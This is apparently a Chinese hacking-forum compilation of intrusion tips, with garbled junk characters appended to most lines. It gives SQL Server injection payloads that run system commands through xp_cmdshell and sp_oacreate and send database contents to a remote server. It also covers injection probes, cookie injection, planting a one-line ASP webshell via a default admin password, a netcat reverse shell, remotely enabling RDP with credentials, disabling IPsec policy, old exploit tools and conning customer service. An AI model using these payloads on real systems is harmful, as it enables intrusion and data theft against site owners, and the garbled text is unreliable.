SA点数据库分离技术相关
7 ?7 w+ Q! e4 D: q% W0 S# J$ E
' t5 D, ?: s A' `7 ~9 C# j2 ~% c
2 `" y( V: ]5 R/ CSA点数据库分离搞法+语句:% j. Y8 g5 o4 l; x& S9 J
: e* B2 F: A% A
注射点不显错,执行下面三条语句页面都返回正常。+ q! a, v# t* v& W8 Z, N
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
3 f; j$ `9 n. p2 A2 l# J6 yand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
+ x$ @5 P4 e1 T9 Cand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
# O5 h& c8 |3 G' @" W7 `可以列目录,判断系统为2000,web与数据库分离
! Q4 @8 ~0 B9 ~7 l* i8 c遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
2 i: x: i m/ T" H2 D T5 t在注射点上执行3 {0 m6 u+ k9 j" B3 |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--7 B9 c& p% K6 }' r6 ~' M
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP5 |. |. c& G6 {9 W' q, i' _+ u1 o3 _
还有我用NC监听得其他端口都没有得到IP。
" K j, Y, M( K! V6 X) u+ f" q }. l8 E+ n) _% X( B) ? n
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。# | t. ^2 q. ?5 ^$ {
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
5 w4 t$ O* h+ V( k" R8 E$ B7 D* Z
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
1 S3 w# I. S$ Q- `8 s3 w3 x3 H
! b% f3 Z: k! i4 L' ?现在就猜想是不是数据库是内网而且不能连外网。9 K2 N3 F1 p. |5 n( v1 o3 m
# C2 t' @/ N2 P/ p$ p0 K( M
9 `& {/ F; E9 u/ L5 K$ _6 Qaccess导出txt文本代码! @7 E3 `0 t: i+ N+ V0 Q* A) r
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin- h: Z' |% ^1 ~; K4 J! ]
- ?; B4 x# L3 [# _0 Z7 O
% R0 m& T, x/ a; g( Y+ p: E
0 a& D! u8 c+ J! x# V' i8 [( d2 `' K自动跳转到指定网站代码头
; m$ ?3 Z# U. J# R9 M l<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
3 K8 z/ O0 R5 F0 U( |8 ]. A* G: ?0 H( {' T$ v9 Z
9 B- `/ O& D/ d% J! s* `5 j4 N6 C
入侵java or jsp站点时默认配置文件路径:
" Q5 U- B$ W) J" m3 I$ `% ]\web-inf\web.xml
5 f; L+ t2 Q( G- o) h. t4 ?( Etomcat下的配置文件位置:
1 _4 M& ~. N4 n$ K% \4 @\conf\server.xml (前面加上tomcat路径)
, |( k' H0 Q! B\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
! r6 B0 A/ d/ `7 Z* o& l! `6 s' f
* F* m/ o7 w3 D1 z( ?( h/ P9 z: Q ^* I9 {# [
- Y2 G5 F" c& g& {: M" c3 ?
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:+ h. E8 v5 H4 T1 }
-1%23
& Z1 Z! j$ t0 Z6 O& X3 x Q>
) ^! r9 X' U6 {7 ^' B<
) I2 m' R. g" S9 k' g1'+or+'1'='1
# \- F9 R3 P# d5 b1 D! ^- qid=8%bf
; V Q5 |) f; {0 M t' H6 {4 I# K2 `, n, s
全新注入点检测试法:
) |. a) x9 ^: Q+ h# C在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。% m- X0 d: J& ]* t/ N6 Y
3 o* a: d7 B, F" l7 d& Q. R) A在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
0 F7 j) r8 C- S$ l9 y4 v; r% Q- k! Z( t9 i# p
搜索型注入判断方法:
c" ]1 o3 }. Z( p, K- \1 e北京%' and '1'='1' and '%'='+ l, T/ t2 s; P$ i+ K$ Z; B0 t
北京%' and '1'='2' and '%'='9 Q" Y! j i2 w0 @* x4 g9 B
6 ]3 j: E6 \6 ]* B+ d& f% R% U& Z
COOKIES注入:
2 l5 I2 K+ D2 {/ k: M8 t8 E# F$ f9 j
javascript:alert(document.cookie="id="+escape("51 and 1=1"));( H A: J6 X/ B4 _. d% m% ~% G
J. f# c: v0 F2000专业版查看本地登录用户命令:
6 D0 p3 Q) ~" U, X7 cnet config workstation
) T3 s ]# b: U* Z* P8 [& k; H* n
1 o4 t: F( i2 R* }9 Y% p8 ]0 n8 i- E- t- V) n6 q+ I
2003下查看ipsec配置和默认防火墙配置命令:' Q3 R" F5 Q3 u
netsh firewall show config
' c9 ~: {* r, E4 }netsh ipsec static show all. m4 [% m% ]9 S2 o1 S
# H% S2 Z8 Y% J" ~& F1 y# u* J不指派指定策略命令:
* x( p: @+ y% j h$ T9 ynetsh ipsec static set policy name=test assign=n (test是不指派的策略名)
% k7 h5 [9 J1 E/ _netsh ipsec static show policy all 显示策略名
0 T1 G1 d* M+ s7 i8 S3 c
8 N* q: X2 j8 C, N! s( C3 o+ |% y0 F+ Q* C5 C1 x1 Y) k" E
猜管理员后台小技巧:
3 B& J; H: o2 @2 l* d- Y8 kadmin/left.asp ) B0 a: q; l0 b4 d) d- x
admin/main.asp
% `+ f& h- ]( b# iadmin/top.asp, e+ x" i7 h* f
admin/admin.asp . l9 F3 P" H J: |1 @ u$ L- A8 f
会现出菜单导航,然后迅雷下载全部链接* }; Y/ ?, e! r; @2 s
$ d* u# a3 W9 p3 h) W. q& y
" p4 O0 {9 S+ [3 W) G- b! p7 U% f
社会工程学:' s, X/ L2 j; g9 _) A, |' b6 ~: c' V
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人# {, S# r. C' P" c) y
然后去骗客服
" y x4 \# u1 Z. v: }2 D. O( V& `! l/ G
3 J- u& h6 N+ M# V' b$ k
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
! y; C$ G& |1 e查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, , P6 G2 `0 l- f% A% b6 G4 R' k+ h
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
/ ]( y" z4 l4 M1 u3 Q- O$ T6 L3 F G% b) Z+ U0 ]9 r8 Q7 o
& Q' Q# n9 x2 H" T
4 @8 O+ s- q: _1 q# b, N# N6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
6 C9 `+ X7 P+ r" W
, w6 u6 P7 i2 p7 D+ q+ _# B
: o+ |: _/ d7 q+ E I" o2 Q) m$ @9 U% n7 L, ]" V
CMD加密注册表位置
, f) `/ S& y4 m+ o2 \7 _) V(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor6 Q( `* J U% ~ o
AutoRun
7 q# K# s6 K1 N7 `2 E/ Z6 N/ Z3 ^3 o5 W. B( U
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
( B) K; \$ |( i' U* N7 ]$ m! _AutoRun
2 W! x" Q. M5 Z
7 T; Y" [3 ]) d( E9 m2 n2 B1 @2 X1 @
在找注入时搜索Hidden,把他改成test( E# p3 U5 t; X& H
! U3 v3 H6 ~: |4 ]7 [
( [( C* E' I6 d8 b( e# ^% N5 t: ]
+ N/ d/ Q( N- n- c+ X7 \mstsc /v:IP /console 8 p+ D C) V A- p9 I
5 l6 r- o* V# }7 v: z. F. Y
: O% L8 d9 G! I( I& w% j8 f
一句话开3389:0 w8 V% h: E& K3 _7 W/ f2 w( R1 F
; e9 v& A# U, J( }9 H3 A3 E最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> + z4 P8 p0 k7 {- q
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.2 W l" c$ T$ R6 I u1 V
+ {! N% _0 h* x' M5 o, d
) J4 a# f& E1 T* f" x A- c$ a2 K知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
" T3 D& m* q/ B' n0 T: Z8 J0 cInsert into admin(user,pwd) values('test','test')) d9 B$ Q. i( @0 D
6 |+ u- n3 a7 `2 }% C- r" d! a% x, u
NC反弹6 ^9 O5 V" n q( f8 ^ d
先在本机执行: nc -vv -lp 监听的端口 (自己执行) 4 b7 M8 i& M2 @/ o4 `9 h) L
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行). c, v# ?7 V8 \/ H' u
, V+ A- c* W y
. X0 n0 B- a! B1 ]在脚本入侵过程中要经常常试用%00来确认下参数是否有问题4 }: N* H. I& {3 p9 C* y
6 D& b6 m! s# J0 z8 D9 r6 @
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
% Y& P, ]5 }) u3 }# `: D( K3 s7 t2 n例如:
" y! p$ A+ [9 b* Fsubst k: d:\www\ 用d盘www目录替代k盘8 @. i, n$ T" J* N0 k' q
subst k: /d 解除K盘代替 |